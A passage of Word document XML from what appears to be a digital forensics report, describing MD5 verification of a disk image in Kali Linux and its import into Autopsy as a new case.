      </w:r>
      <w:r w:rsidRPr="47DF796B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forensic Image Test File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F912E0D" w14:textId="1C424D44" w:rsidR="00444C92" w:rsidRPr="001A631B" w:rsidRDefault="00444C92" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B999844" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRPr="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E918D2">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The forensic challenge image (8-jpeg-search.dd) was first verified for integrity before any analysis was performed. This ensured that the evidence was not modified during transfer or handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E732D2F" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRPr="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26697491" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E918D2">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The following commands were executed in Kali Linux:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2671E4A3" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB78259" w14:textId="36A9AD80" w:rsidR="00E918D2" w:rsidRPr="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E918D2">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">md5sum 8-jpeg-search.dd &gt; HashImage.txt  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41106C32" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRPr="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E918D2">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">cat HashImage.txt  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C26722" w14:textId="77777777" w:rsidR="00D10CD6" w:rsidRDefault="00D10CD6" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E13882A" w14:textId="1D0FDDF3" w:rsidR="00E918D2" w:rsidRPr="00D10CD6" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D10CD6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Explanation of commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5B9078" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRPr="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E6D888" w14:textId="37714600" w:rsidR="00D10CD6" w:rsidRDefault="00E918D2" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D10CD6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>md5sum: Generates a digital fingerprint (128-bit hash) unique to the file. Any change to the file results in a different hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B380A04" w14:textId="77777777" w:rsidR="00D10CD6" w:rsidRPr="00D10CD6" w:rsidRDefault="00D10CD6" w:rsidP="00D10CD6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BD6AB7" w14:textId="64C8BFA5" w:rsidR="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D10CD6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>HashImage.txt: Redirects the output into a file for permanent record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F58337C" w14:textId="77777777" w:rsidR="00D10CD6" w:rsidRPr="00D10CD6" w:rsidRDefault="00D10CD6" w:rsidP="00D10CD6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB3B3F0" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRPr="00D10CD6" w:rsidRDefault="00E918D2" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D10CD6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>cat HashImage.txt: Displays the stored hash for verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020AE6A4" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRPr="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773EDCFE" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRPr="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D605B4">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E918D2">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> The MD5 hash matched the value calculated later in Autopsy, confirming that the image was intact and unaltered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0FE0D" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRPr="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FF2BD4" w14:textId="77777777" w:rsidR="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Roboto" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B14E406" w14:textId="5B0CFE99" w:rsidR="00103363" w:rsidRPr="00103363" w:rsidRDefault="00103363" w:rsidP="00103363">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00103363">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32052979" wp14:editId="685DCCFC">
            <wp:extent cx="5943600" cy="3403600"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="780789873"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9873" name="Picture 63"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noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB1AF5F" w14:textId="77777777" w:rsidR="00B04B5F" w:rsidRDefault="00B04B5F" w:rsidP="00E918D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D28AC5A" w14:textId="24206A78" w:rsidR="00E918D2" w:rsidRDefault="00E918D2" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002676B7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00AD0A35" w:rsidRPr="002676B7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004B4757" w:rsidRPr="004B4757">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The MD5 hash matched the value calculated later in Autopsy, confirming that the image was intact and unaltered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530DB97" w14:textId="77777777" w:rsidR="004B4757" w:rsidRDefault="004B4757" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E681430" w14:textId="77B3E9A3" w:rsidR="00444C92" w:rsidRDefault="68696856" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="28E2C82A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create and Import Forensic Image into Autopsy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593B1A9C" w14:textId="77777777" w:rsidR="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00822E8E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268532B8" w14:textId="679EFC1F" w:rsidR="00822E8E" w:rsidRPr="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00822E8E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Autopsy, an open-source forensic tool, was used to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> the image in a controlled forensic environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50805DE5" w14:textId="77777777" w:rsidR="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00822E8E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF77A49" w14:textId="4968B1F8" w:rsidR="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00822E8E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Steps performed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B815A7" w14:textId="77777777" w:rsidR="00822E8E" w:rsidRPr="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00822E8E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571B1A42" w14:textId="77777777" w:rsidR="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">A new case named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>TechShield_Forensic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> was created with examiner details for traceability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC85CD5" w14:textId="77777777" w:rsidR="003F6A37" w:rsidRPr="00822E8E" w:rsidRDefault="003F6A37" w:rsidP="003F6A37">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CB4AB7" w14:textId="77777777" w:rsidR="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The raw disk image (8-jpeg-search.dd) was added as evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE74DA0" w14:textId="77777777" w:rsidR="003F6A37" w:rsidRPr="00822E8E" w:rsidRDefault="003F6A37" w:rsidP="003F6A37">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FE282C" w14:textId="77777777" w:rsidR="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Autopsy automatically recalculated the MD5 hash of the image, which matched the baseline hash from Kali, proving no changes were made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D2577" w14:textId="4C58688E" w:rsidR="00822E8E" w:rsidRPr="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00822E8E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C036456" wp14:editId="365EE686">
            <wp:extent cx="5943600" cy="2985770"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="995394148"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94148" name="Picture 61"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985770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAEBBD6" w14:textId="77777777" w:rsidR="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00822E8E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Roboto" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B57E3B9" w14:textId="545A3AF1" w:rsidR="00822E8E" w:rsidRPr="00822E8E" w:rsidRDefault="00822E8E" w:rsidP="00822E8E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A636AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00FB52DB" w:rsidRPr="00A636AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A636AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00822E8E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Autopsy case setup and ingest module configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6843590E" w14:textId="0E7C81B0" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9B9690" w14:textId="04F82011" w:rsidR="00444C92" w:rsidRDefault="68696856" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
